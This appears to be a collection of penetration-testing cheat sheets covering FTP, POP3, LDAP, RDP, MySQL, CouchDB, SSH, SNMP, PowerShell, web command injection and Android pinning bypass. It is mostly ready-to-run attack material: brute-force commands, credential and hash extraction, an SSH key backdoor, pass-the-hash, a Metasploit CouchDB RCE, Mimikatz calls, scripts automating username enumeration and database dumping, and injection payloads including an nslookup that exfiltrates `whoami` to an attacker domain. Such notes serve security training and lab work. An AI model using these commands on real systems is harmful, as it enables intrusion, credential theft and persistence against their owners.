### Banner Grabbing

```bash
nc <ip> 21 # Grab the banner
telnet -vn <ip> 21
openssl s_client -connect crossfit.htb:21 -starttls ftp # Get the certificate, if any (explicit FTPS)
```

### Connections

#### Anonymous Login

* `anonymous:anonymous`
* `anonymous:`
* `guest:`
* `ftp:ftp`
* `admin:admin`

```bash
ftp <ip>
ftp -p <ip> # Passive mode login
>ls -a      # List all files (even hidden ones; yes, they could be hidden)
>dir -a
>passive    # Toggle passive mode
>binary     # Set transmission to binary instead of ascii
>ascii      # Set transmission to ascii instead of binary
>bye        # exit
```

#### Downloading

```bash
PASSIVE
BINARY
get <file>
mget *   # Download all files
wget -m ftp://anonymous:anonymous@10.10.10.98 # Download all files (mirror)
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all files, active mode
```

#### Uploading

```bash
PASSIVE
BINARY
put <file>
```

### nmap Scripts

```bash
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <ip>
nmap --script ftp-* -p 21 <ip>
```

### Checks

* [ ] Check for anonymous access
* [ ] Check if you can upload a file to trigger a webshell through the web app (FTP root shared with the web root)
* [ ] Check if you can download backup files to extract included passwords
* [ ] Check the version of FTP for exploits

## Brute Forcing

```bash
hydra -V -f -L <users.txt> -P <passwords.txt> ftp://<ip> -u -vV
hydra -l root -P passwords.txt [-t 32] <ip> ftp
```
-------------------------------------------------------------------------------- /pentesting-network/110-pop3.md: --------------------------------------------------------------------------------
# 110 (POP3)

## Enumeration

### Checks

* [ ] Check version for exploits
* [ ] Check mails for the presence of credentials

### Banner Grabbing

```bash
nc -nv <ip> 110
telnet <ip> 110
openssl s_client -connect <ip>:995 -crlf -quiet # POP3S
```

### nmap

```bash
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p <port> <ip> # Both are default scripts
```

## Commands

```
USER uid        Log in as "uid"
PASS password   Substitute "password" for your actual password
STAT            List number of messages, total mailbox size
LIST            List messages and sizes
RETR n          Show message n
DELE n          Mark message n for deletion
RSET            Undo any changes
QUIT            Logout (expunges messages if no RSET)
TOP msg n       Show first n lines of message number msg
CAPA            Get capabilities
```

## Brute Force

### Hydra

```bash
hydra -l <user> -P /path/to/passwords.txt -f <ip> pop3 -V
hydra -S -v -l <user> -P /path/to/passwords.txt -s 995 -f <ip> pop3 -V # Over TLS (POP3S)
```

### Metasploit

```bash
use auxiliary/scanner/pop3/pop3_login
```

## Example

```bash
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2 1021

retr 1

+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
```
-------------------------------------------------------------------------------- /misc/powershell.md: --------------------------------------------------------------------------------
# PowerShell

## Examples

### Commands

```powershell
Get-Verb                 # List available verbs
(Get-Verb).count         # Get the count of command output
help push                # Get help on commands matching a verb/noun (e.g. Push-Location)
help pushd               # Get help on an alias seen in the previous output
hostname > direct.txt    # Redirect output to a file
dir >> direct.txt        # Append output to a file
type direct.txt          # Read out file to the console
cat direct.txt           # Another way to read out file to the console
Get-Process              # Get running processes
echo "Hello World"       # Send Hello World to the console
Write-Host "Hello World" # Send Hello World to the console
```

### Variables

```powershell
$name = 'Erich'
$number = 42
$nlist = 1,3,5,7,11,13
($nlist).count
echo "The list is $nlist"
```

### If Statements

```powershell
if ($nlist[1] -gt 0)
{
    echo "Positive"
}
```

### Loops

```powershell
# Index from 0 and stop before Count; starting at 1 skips the first element and the last iteration reads past the end ($val is $null)
$i = 0
do {
    $val = $nlist | Select-Object -Index $i
    echo "Value is $val"
    $i = $i + 1
} while ($i -lt ($nlist).count)
```

```powershell
ForEach ($val in $nlist)
{
    echo "Value is $val"
}
```

## Nishang

```powershell
# Pre-req
Set-ExecutionPolicy Unrestricted
gci c:\nishang\ -recurse | Unblock-File
Import-Module .\nishang.psm1
# Example commands
Get-Command -Module nishang
Get-Information > info.txt
Get-Help Invoke-Mimikatz -full
Get-Passhashes
Invoke-PortScan -startaddress 10.0.2.1 -endaddress 10.0.2.8 -ScanPort
Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile"
Invoke-BruteForce 10.0.2.8 -service FTP -userlist users.txt -passwordlist passes.txt -verbose -StopOnSuccess
Invoke-Prasadhak # Requires an API key from VirusTotal
```
-------------------------------------------------------------------------------- /pentesting-web/burp-suite.md: --------------------------------------------------------------------------------
# Burp Suite

## Burp Suite Certified Practitioner

How to Prepare

[https://portswigger.net/web-security/certification/how-to-prepare](https://portswigger.net/web-security/certification/how-to-prepare)

Hints and Guidance

[https://portswigger.net/web-security/certification/exam-hints-and-guidance](https://portswigger.net/web-security/certification/exam-hints-and-guidance)

## Server-side topics

### SQL Injection

### Authentication

### Path traversal

### Command injection

### Business logic vulnerabilities

### Information Disclosure

### Access control

### File upload vulnerabilities

### Race conditions

### Server-side request forgery (SSRF)

### XXE injection

### NoSQL injection

### API Testing

### Web cache deception

## Client-side topics

### Cross-site scripting (XSS)

### Cross-site request forgery (CSRF)

### Cross-origin resource sharing (CORS)

### Clickjacking

### DOM-based vulnerabilities

### WebSockets

## Advanced topics

### Insecure deserialization

### Web LLM attacks

### GraphQL API vulnerabilities

### Server-side template injection

### Web cache poisoning

### HTTP Host header attacks

### HTTP request smuggling

### OAuth authentication

### JWT attacks

### Prototype pollution

### Essential skills

-------------------------------------------------------------------------------- /pentesting-network/389-ldap.md: --------------------------------------------------------------------------------
# 389 (LDAP)

## Enumeration

### Anonymous

#### ldapsearch

New Syntax

```bash
ldapsearch -H ldap://<ip> -x -b "DC=hutch,DC=offsec"
ldapsearch -H ldap://192.168.71.122 -x -b "CN=Users,DC=hutch,DC=offsec" # Get user info
# Look for any plaintext passwords in the description field
ldapsearch -H ldap://<ip> -v -x -b "DC=hutch,DC=offsec" "(objectclass=*)"

# If LAPS is in use, an account allowed to read ms-MCS-AdmPwd can pull the local admin password
ldapsearch -H ldap://<ip> -v -x -D <user>@HUTCH.OFFSEC -w <password> -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```

Old Syntax

```bash
ldapsearch -h <ip> -x -s base namingcontexts # Look for the dn, i.e. DC=htb,DC=local
ldapsearch -h <ip> -x -b "DC=htb,DC=local" > ldap-anonymous.out # All ldap info we can query as anonymous
ldapsearch -h <ip> -x -s sub -b "DC=htb,DC=local"
ldapsearch -h <ip> -x -b "DC=htb,DC=local" '(objectClass=Person)' # Look at user info
ldapsearch -h <ip> -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName
# Grab just the usernames to try and brute force/password spray (anchor the grep, or the "# requesting: sAMAccountName" header line ends up in the list)
ldapsearch -h <ip> -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName | grep '^sAMAccountName:' | awk '{print $2}' > userlist.ldap # Make it easier to do a password spray
# Can try to check the password policy with crackmapexec
crackmapexec smb <ip> --pass-pol -u '' -p '' # Using null user & password
# Look for 'Account lockout threshold: 0' # Ideal for brute force
# Brute Force
crackmapexec smb <ip> -u userlist.txt -p pwlist.txt
```

#### nmap

```bash
nmap -n -sV --script "ldap* and not brute" <ip> # Using anonymous credentials
```

### Authenticated

#### ldapdomaindump

```bash
kali@kali:~/ctf/tryhackme/enterprise$ ldapdomaindump 10.10.55.72 -u 'LAB-ENTERPRISE\nik' -p ToastyBoi! -o ldapdomaindumpdir
```
-------------------------------------------------------------------------------- /pentesting-network/3389-rdp.md: --------------------------------------------------------------------------------
# 3389 (RDP)

## Enumeration

### Checks

* [ ] Check if you can log in with the default guest account and a blank password
* [ ] Check if you can brute force users
* [ ] Check for BlueKeep (CVE-2019-0708): `use auxiliary/scanner/rdp/cve_2019_0708_bluekeep` in Metasploit; the `rdp-vuln-ms12-020` nmap script below tests a different, older bug

### nmap

```bash
nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 -oN 3389_nmap_rdp <ip>
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <ip>
```

### Check known credentials

```bash
rdp_check <domain>/<user>:<password>@<ip> # rdp_check.py from impacket
```

### Manual Login

#### rdesktop

```bash
rdesktop <ip>
# Try the default guest account "guest":""
rdesktop -u guest -g 94% <ip>
rdesktop -u guest -p guest -g 94% <ip>
# Use known credentials
rdesktop -u <user> <ip>
rdesktop -d <domain> -u <user> -p <password> <ip>
```

#### xfreerdp

```bash
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:[IP] /u:bitbucket /p:[PW]

xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP
xfreerdp /u:[DOMAIN\]<user> /p:<password> /v:<ip>

xfreerdp /u:[DOMAIN\]<user> /pth:<ntlm_hash> /v:<ip> # Pass-the-hash; needs Restricted Admin mode enabled on the target
```

## Brute Force

Check the lockout policy first (`crackmapexec smb <ip> --pass-pol`); a low threshold turns a brute force into a denial of service for the target's users.

#### ncrack

```bash
ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://<ip>
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://<ip>
```

#### Hydra

```bash
hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp
hydra -f -L <users.txt> -P <passwords.txt> rdp://<ip> -u -vV
```

#### crowbar

```bash
crowbar -b rdp -s <ip>/CIDR -u <user> -C <passwords.txt>
crowbar -b rdp -s <ip>/CIDR -U <users.txt> -C <passwords.txt>
```
-------------------------------------------------------------------------------- /pentesting-network/3306-mysql.md: --------------------------------------------------------------------------------
# 3306 (MySQL)

## Enumeration

### Checks

* [ ] Try default credentials "root":""
* [ ] Brute force credentials
* [ ] Check database content for new passwords
* [ ] Check version for exploits

### Connection

#### Local

```bash
mysql -u root    # Connect as root without a password
mysql -u root -p # A password will be prompted for
```

#### Remote

```bash
mysql --host=<ip> -u root -p
mysql -h <ip> -u root
mysql -h <ip> -P <port> -u root # Non-default port
```

### nmap

```bash
kali@kali:~/oscp/labs/10.11.1.8$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <ip>
nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -oN 3306_nmap_mysql <ip>
```

### Metasploit

```bash
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump # Creds
msf> use auxiliary/admin/mysql/mysql_enum # Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump # Creds
msf> use exploit/windows/mysql/mysql_start_up # Execute commands on Windows, needs creds
```

### Extract Credentials

```bash
cat /etc/mysql/debian.cnf # debian-sys-maint password on Debian/Ubuntu
# Usernames and password hashes straight from the raw MyISAM table file (needs read access to the datadir); the [a-zA-Z] range is spelled out because [a-Z] is an invalid range in the C locale
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```

## Brute Force

### Hydra

```bash
hydra -L <users.txt> -P <passwords.txt> <ip> mysql -vV -I -u
```
-------------------------------------------------------------------------------- /pentesting-web/web-testing.md: --------------------------------------------------------------------------------
# Web Testing

## OWASP

### OWASP Top 10

{% embed url="https://owasp.org/www-pdf-archive/OWASP_Top_10-2017_(en).pdf.pdf" %}

### OWASP Testing Guide

{% embed url="https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf" %}

### OWASP Testing Checklist

{% embed url="https://github.com/tanprathan/OWASP-Testing-Checklist" %}

### OWASP Juice Shop

## Approach Web Testing

1. Two main approaches
   1. Web crawling
   2. Proxy interception
2. Manual checks
   1. Checking source for comments
      1. Credentials
      2. Bugs commented out
      3. Client-side code
3. Webserver
   1. Technologies
      1. Known vulnerabilities
      2. Cryptographic weaknesses
   2. Transport services
      1. HTTP Strict Transport Security (HSTS)
      2. HTTP and HTTPS
      3. WebSockets
4. Authentication
   1. Ecommerce
      1. Payment gateway interfaces
   2. Credentials
      1. Query strings
      2. Password reset pages
      3. Default and hard-coded credentials
5. Session Management
   1. Hijacking a session
   2. Intercepting session cookies
   3. Predicting session tokens

## Test Websites with Burp Suite

* Utilize the Target tab
* Add the target to the Scope
* View found information under Site Map

## Check Web Servers with Nikto

```bash
nikto -h <url>
```

Enumerate the output.
## Fingerprinting Web Servers

### HTTPRecon

{% embed url="https://www.computec.ch/projekte/httprecon?s=download" %}

### NetSquare

{% embed url="https://www.net-square.com/httprint.html" %}

### Uniscan

```bash
uniscan -u <url>
```

## Web Server Penetration using SQLmap

```bash
sqlmap -u https://admin-portal.europacorp.htb/ --forms --crawl=2 --dump
```
-------------------------------------------------------------------------------- /pentesting-web/authentication.md: --------------------------------------------------------------------------------
# Authentication

## PortSwigger

[https://portswigger.net/web-security/authentication](https://portswigger.net/web-security/authentication)

## PortSwigger Labs

### Password-based login

[https://portswigger.net/web-security/authentication/password-based](https://portswigger.net/web-security/authentication/password-based)

#### Username enumeration via different responses (Apprentice)

> This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.
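Scripted version of the enumeration step this lab asks for, as an added example that is not part of the original write-up (the write-up uses Burp Intruder for it). The idea is the same one Intruder relies on: record the error text the login form returns for a username that cannot exist, then flag every wordlist entry whose response differs. The `TARGET` host, the `username`/`password` field names and the `<p class=is-warning>` extraction in `login_probe` are assumptions about the lab's form and must be adjusted for any other application; `mock_login_probe` and the wordlist are constructed stand-ins so the logic can be run offline.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): username enumeration via
# different responses. Baseline = the server's error for a nonexistent user;
# any candidate that gets a different response is a likely valid account.
# Assumed: TARGET, form field names and the is-warning extraction below.

TARGET="${TARGET:-https://0a1b2c3d.web-security-academy.net}"   # assumed lab host

# Real probe: POST one credential pair and return the error string the page shows.
# The sed pulls the lab's <p class=is-warning>...</p> message; adjust for other apps.
login_probe() {
  curl -s -X POST "$TARGET/login" \
       --data-urlencode "username=$1" --data-urlencode "password=$2" |
    sed -n 's/.*<p class=is-warning>\([^<]*\)<\/p>.*/\1/p' | head -n 1
}

# Constructed stand-in for login_probe so the logic can be exercised offline:
# only "carlos" exists, everyone else gets the generic "Invalid username".
mock_login_probe() {
  case "$1" in
    carlos) echo "Incorrect password" ;;
    *)      echo "Invalid username" ;;
  esac
}

# enumerate_usernames PROBE_FN WORDLIST
# Prints each candidate whose response differs from the baseline.
enumerate_usernames() {
  local probe="$1" wordlist="$2" baseline resp user
  baseline=$("$probe" "definitely-not-a-user-$$" "x")   # random-looking user as baseline
  while IFS= read -r user; do
    [ -z "$user" ] && continue
    resp=$("$probe" "$user" "x")
    if [ "$resp" != "$baseline" ]; then
      echo "$user"                                      # response changed -> user likely exists
    fi
  done < "$wordlist"
}

# Offline demo with a constructed wordlist (prints: carlos).
# Live: enumerate_usernames login_probe /usr/share/seclists/Usernames/Names/names.txt
demo_wordlist=$(mktemp)
printf '%s\n' admin root carlos wiener > "$demo_wordlist"
enumerate_usernames mock_login_probe "$demo_wordlist"
rm -f "$demo_wordlist"
```

Once a username comes back, the same probe drives the password brute force: the response for the right password is no longer the "Incorrect password" text but a redirect to the account page, so compare against that baseline instead. Keep an eye on lockout and rate limiting before pointing this at anything other than a lab.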
* Navigated to the Login page
* Entered generic credentials (test:test)
* Error returned: "Invalid username"
* We can determine a valid username by brute-forcing with a wordlist in Burp Intruder (sort by response length, or grep for the error message that differs)
* Opened Burp

#### Username enumeration via subtly different responses (Practitioner)

#### Username enumeration via response timing (Practitioner)

#### Broken brute-force protection, IP block (Practitioner)

#### Username enumeration via account lock (Practitioner)

#### Broken brute-force protection, multiple credentials per request (Expert)

### Multi-factor authentication

[https://portswigger.net/web-security/authentication/multi-factor](https://portswigger.net/web-security/authentication/multi-factor)

#### 2FA simple bypass (Apprentice)

#### 2FA broken logic (Practitioner)

#### 2FA bypass using a brute-force attack (Expert)

### Other Authentication Mechanisms

[https://portswigger.net/web-security/authentication/other-mechanisms](https://portswigger.net/web-security/authentication/other-mechanisms)

#### Password reset broken logic (Apprentice)

#### Password reset poisoning via middleware (Practitioner)

#### Password brute-force via password change (Practitioner)

#### Brute-forcing a stay-logged-in cookie (Practitioner)

#### Offline password cracking (Practitioner)

-------------------------------------------------------------------------------- /pentesting-network/5984-6984-couchdb.md: --------------------------------------------------------------------------------
# 5984, 6984 (CouchDB)

## Enumeration

### Automatic

```bash
nmap -sV --script couchdb-databases,couchdb-stats -p <port> <ip>
msf> use auxiliary/scanner/couchdb/couchdb_enum
```

### Manual

```bash
curl http://<ip>:5984
# Banner grab (can also open in a browser)
curl http://<ip>:5984/_all_dbs
# List all the databases
curl http://user:password@<ip>:5984/_all_dbs
# List all the databases with authentication
curl http://<ip>:5984/<db>
# Database information
curl http://<ip>:5984/<db>/_all_docs
# List each entry inside a database
curl http://<ip>:5984/<db>/<doc_id>
# Read the content of a document in a database
curl http://10.10.202.192:5984/_utils/
# Path for the web administration tool (Fauxton)
```

## Exploitation

### Unprotected

#### CVE-2017-12636

Since we should have administrative access here we should be able to find an exploit to execute.

* Found: [https://github.com/moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636)
* Download the code and update the **target** and **command** variables in the script
* Start a netcat listener: `nc -lvnp 4444`
* Run the exploit: `python3 exploit.py`

### Protected

Since we do NOT have access we will need to get access.
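Whether the instance is unprotected or you have just recovered admin credentials (see the brute force steps in this section), the manual curl sequence from the Enumeration section above is worth automating so nothing is missed, in particular the `_users` database, which holds the password hashes of every CouchDB account. The script below is an added example, not part of the original notes: it walks `_all_dbs`, then each database's `_all_docs`, then every document. It assumes plain HTTP on 5984, optional credentials in `COUCH_AUTH`, and no `jq` on the box (so the JSON is picked apart with grep and cut); the canned responses in `sample_response` are constructed for the offline demo and are not from any real target.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): automate the manual curl walk
# (_all_dbs -> <db>/_all_docs -> <db>/<doc>). Assumptions: HTTP on 5984,
# optional COUCH_AUTH=user:pass, no jq. sample_response is a constructed
# stand-in for the real HTTP fetcher so the walk runs offline.

COUCH_URL="${COUCH_URL:-http://127.0.0.1:5984}"
COUCH_AUTH="${COUCH_AUTH:-}"               # e.g. admin:madalina once you have creds
COUCH_FETCH="${COUCH_FETCH:-couch_http}"   # name of the function that performs GETs

# Real fetcher: GET a path, with basic auth if COUCH_AUTH is set.
couch_http() {
  if [ -n "$COUCH_AUTH" ]; then
    curl -s -u "$COUCH_AUTH" "$COUCH_URL$1"
  else
    curl -s "$COUCH_URL$1"
  fi
}

# Constructed responses (not captured from a real server) for the offline demo.
sample_response() {
  case "$1" in
    /_all_dbs)         echo '["_replicator","_users","secret"]' ;;
    /secret/_all_docs) echo '{"total_rows":2,"offset":0,"rows":[{"id":"flag","key":"flag","value":{"rev":"1-a"}},{"id":"creds","key":"creds","value":{"rev":"1-b"}}]}' ;;
    /_users/_all_docs|/_replicator/_all_docs) echo '{"total_rows":0,"offset":0,"rows":[]}' ;;
    /secret/flag)      echo '{"_id":"flag","_rev":"1-a","value":"THM{example}"}' ;;
    /secret/creds)     echo '{"_id":"creds","_rev":"1-b","user":"admin","password":"madalina"}' ;;
    *)                 echo '{"error":"not_found"}' ;;
  esac
}

# One database name per line. _users is kept on purpose: it stores account hashes.
couch_dbs() {
  "$COUCH_FETCH" /_all_dbs | tr -d '[]" ' | tr ',' '\n' | sed '/^$/d'
}

# One document id per line for database $1 (pulled from the "id" fields of _all_docs).
couch_doc_ids() {
  "$COUCH_FETCH" "/$1/_all_docs" | grep -o '"id":"[^"]*"' | cut -d'"' -f4
}

# Walk everything; prints "<db>/<doc><TAB><document json>".
couch_dump() {
  couch_dbs | while IFS= read -r db; do
    couch_doc_ids "$db" | while IFS= read -r id; do
      printf '%s/%s\t%s\n' "$db" "$id" "$("$COUCH_FETCH" "/$db/$id")"
    done
  done
}

# Offline demo against the canned responses. For a live target leave COUCH_FETCH
# unset and export COUCH_URL and (if needed) COUCH_AUTH instead.
COUCH_FETCH=sample_response couch_dump
```

On CouchDB 3.x `_all_dbs` is admin-only by default, so an unauthenticated run returning `{"error":"unauthorized"}` is not a dead end: it is the signal to move on to the brute force below and rerun with `COUCH_AUTH` set.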
#### Brute Force

Hydra

```bash
hydra -l admin -P /opt/100-common-passwords.txt -s 5984 -f <ip> http-get /_utils
# And we get the password
```

If `/_utils` serves Fauxton's static files to everyone, every guess returns 200 and hydra "succeeds" on the first word; in that case point it at a path the server actually protects, such as `/_all_dbs`.

Metasploit

```bash
use auxiliary/scanner/couchdb/couchdb_login
set RHOSTS demo2.ine.local
set USERNAME admin
set PASS_FILE /root/Desktop/wordlists/100-common-passwords.txt
set STOP_ON_SUCCESS True
set VERBOSE true
exploit
```

#### RCE

Metasploit

```bash
search couchdb
use exploit/linux/http/apache_couchdb_cmd_exec
set PAYLOAD linux/x64/meterpreter/bind_tcp
set RHOSTS <ip>
set LHOST <attacker_ip>
set HttpUsername admin
set HttpPassword madalina
exploit
```
-------------------------------------------------------------------------------- /pentesting-network/22-ssh.md: --------------------------------------------------------------------------------
# 22 (SSH)

## Enumeration

### Checks

* [ ] Try easy username-password combinations
* [ ] Check for username enumeration vulnerabilities
* [ ] Check version for vulnerabilities
* [ ] Attempt brute forcing
* [ ] Check for port knocking

### Banner Grabbing

```bash
nc <ip> 22
nc -vn <ip> 22
```

### Connections

#### SSH

```bash
ssh <user>@<ip>
ssh <user>@<ip> -i id_rsa # Login via private key (chmod 600 id_rsa first, or ssh refuses it)
```

#### SCP

```bash
scp <user>@<ip>:/path/to/copy <local_path>
```

#### SFTP

```bash
sftp <user>@<ip>
```

### nmap Scripts

```bash
nmap -p <port> -sV -Pn -T4 --script=ssh* <ip>
```

### Restricted Shell Breakout

```bash
ssh joe@funbox -i joe_id_rsa -t "bash --noprofile"
ssh seppuku@192.168.53.90 -t "bash --noprofile"
```

### Account Login Error

```bash
# When getting a specific error where only SFTP works, try running a command instead of an interactive shell...
ssh -v <user>@<ip> id
ssh -v <user>@<ip> /bin/bash
```

### Port knocking

```bash
# If nmap comes back showing port 22 as filtered...
# We need to find /etc/knockd.conf (through LFI, FTP or something else)
# Inside there is a sequence
knock <ip> <seq1> <seq2> <seq3>
# Check nmap again
```

### Key Generation

```bash
# Attack machine
ssh-keygen -f <key>
chmod 600 <key>
cat <key>.pub
# Target
echo "<contents of key.pub>" >> ~/.ssh/authorized_keys
```

## Backdoor

```bash
# Attacker
ssh-keygen -f <key>
chmod 600 <key>
cat <key>.pub # Copy this

# Victim
echo "<contents of key.pub>" >> ~/.ssh/authorized_keys
chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys # sshd ignores the file if it is group/world writable

# Connect
ssh -i <key> <user>@<ip>
```

## Brute Force

```bash
hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 <ip> ssh
hydra -l <user> -P passwords.txt -t 20 <ip> ssh
hydra -V -f -L <users.txt> -P <passwords.txt> ssh://<ip> -u -vV
```
-------------------------------------------------------------------------------- /pentesting-network/161-snmp.md: --------------------------------------------------------------------------------
# 161 (SNMP)

## Enumeration

### Checks

* [ ] Try the default community strings 'public' and 'private'
* [ ] Enumerate version of OS, users, and processes

### Useful OIDs

| OID                    | Information      |
| ---------------------- | ---------------- |
| 1.3.6.1.2.1.25.1.6.0   | System Processes |
| 1.3.6.1.2.1.25.4.2.1.2 | Running Programs |
| 1.3.6.1.2.1.25.4.2.1.4 | Process Path     |
| 1.3.6.1.2.1.25.2.3.1.4 | Storage Units    |
| 1.3.6.1.2.1.25.6.3.1.2 | Software Name    |
| 1.3.6.1.4.1.77.1.2.25  | User Accounts    |
| 1.3.6.1.2.1.6.13.1.3   | TCP Local Ports  |

### Commands

#### nmap

```bash
nmap -sU -p161 --script "snmp-*" <ip>
```

### Brute Force Community Strings

```bash
# try 100+ community strings
onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt <ip>
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ip>
# only try "public" and "private"
onesixtyone -i targets.list
```

#### snmpwalk

```bash
snmpwalk -c public -v1 192.168.1.101 # community string and which version
# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerate running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2
```

```bash
snmpwalk -v 2c -c public <ip>
snmpwalk -v 2c -c public <ip> hrSWInstalledName
snmpwalk -v 2c -c public <ip> hrMemorySize
snmpwalk -v 2c -c public <ip> sysContact # Get the sysContact variable, i.e. nikos
snmpset -v 2c -c public <ip> sysContact.0 s els # Change the sysContact variable to els (only works with a read-write community string)
```

#### snmpbulkwalk

```bash
snmpbulkwalk -c <community> -v <version> <ip>
```

#### snmp-check

```bash
snmp-check <ip>
snmp-check -t <ip> -c public
```

### Modifying SNMP Values

[http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html](http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html)
-------------------------------------------------------------------------------- /pentesting-web/command-injection/README.md: --------------------------------------------------------------------------------
# Command Injection

### How to Find

#### Black-Box Testing

* Map the application (using Burp)
* Identify all instances where the web application appears to be interacting with the underlying operating system
* Fuzz the application
  * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`.
* For in-band command injection, analyze the response of the application to determine if it's vulnerable.
* For blind command injection, you need to get creative.
  * Trigger a time delay using the ping or sleep command.
  * Output the response of the command in the web root and retrieve the file directly using a browser.
  * Open an out-of-band channel back to a server you control.

#### White-Box Testing

* Perform a combination of black-box and white-box testing
* Map all input vectors in the application.
* Review source code to determine if any of the input vectors are added as parameters to functions that execute system commands.

### How to Exploit

#### In-band

* Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`.
* Chain another command
  * `127.0.0.1 && cat /etc/passwd &`
  * `127.0.0.1 & cat /etc/passwd &`
  * `127.0.0.1 || cat /etc/passwd &`

#### Blind

* Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`.
* Trigger a time delay.
  * `127.0.0.1 && sleep 10 &`
  * `127.0.0.1 & ping -c 10 127.0.0.1 &`
* Output the response of the command in the web root and retrieve the file directly using a browser
  * `127.0.0.1 & whoami > /var/www/static/whoami.txt &`
* Open an out-of-band channel back to a server you control.
  * `127.0.0.1 & nslookup asdfjkl.web-attacker.com &`
  * ``127.0.0.1 & nslookup `whoami`.asdfjkl.web-attacker.com &``

### Automated Exploitation Tools

* Burp Suite
* arachni
* OWASP ZAP
* Wapiti
* Acunetix
* w3af

### How to Prevent

The most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code. Instead, implement the required functionality using safer platform APIs.

* For example: use `mkdir()` instead of `system("mkdir /dir_name")`

If it is required to perform OS commands using user-supplied input, then strong input validation must be performed.

* Validate against a whitelist of permitted values.
* Validate that the input is as expected (for example a number, or an alphanumeric token of bounded length) and pass it to the program as a separate argument-vector element rather than splicing it into a command string handed to a shell.
-------------------------------------------------------------------------------- /mobile/android/support-and-tools.md: --------------------------------------------------------------------------------
# Support and Tools

## Notes

### OS Versions

* Android 6 - Device does not need to be rooted for apps to trust the Burp CA installed as a user certificate
* Android 7.1 - Device needs to be rooted before it will accept the Burp cert, because apps targeting API 24+ no longer trust user-added CAs by default (the cert has to go into the system store, or pinning/trust must be bypassed with Frida)

### Certificate Pinning

## Setup

### Frida Server

Find out the architecture of the device

`adb shell getprop ro.product.cpu.abi`

Download the matching Frida server from the following URL and extract it

* https://github.com/frida/frida/releases/
* frida-server-xxxx-android-x86.xz
* frida-server-xxxx-android-x86\_64.xz
* Windows: `adb push C:\ADB\<frida-server> /data/local/tmp`
* Linux: `adb push ADB/<frida-server> /data/local/tmp`
* Both: `adb shell chmod 777 /data/local/tmp/<frida-server>`

### Burp

1. Open Burp and go to the Proxy tab
2. Select the Options tab
3. Click Import/Export CA Certificate
4. Export the certificate in DER format
5. Push the certificate onto the device with ADB (we will need this later for Frida)
   1. `adb push cacert.der /data/local/tmp/cert-der.crt`

### SSL Pinning

Script that will be used to override the certificate pinning mechanism (it reads the CA from `/data/local/tmp/cert-der.crt`, the path pushed above)

[https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/](https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/)

#### Script injection to bypass certificate pinning

* Push the script onto the device
  * `adb push C:\ADB\fridascript.js /data/local/tmp`
  * (`frida -l` reads the script from the host, so this push is only needed if you run frida from the device itself)
* Check and run the Frida server on the device
  * `adb shell /data/local/tmp/<frida-server> &`
* List all the running processes on the device
  * `frida-ps -U`
* Locate your application's package name in the list
  * i.e. 3672 com.twitter.android
* Hook the Frida script into your application
  * `frida -U -f com.twitter.android -l <fridascript.js> --no-pause`
  * Frida 16 removed `--no-pause` (a spawned app is resumed automatically), so drop the flag on current versions

#### Why we need certificate pinning bypass

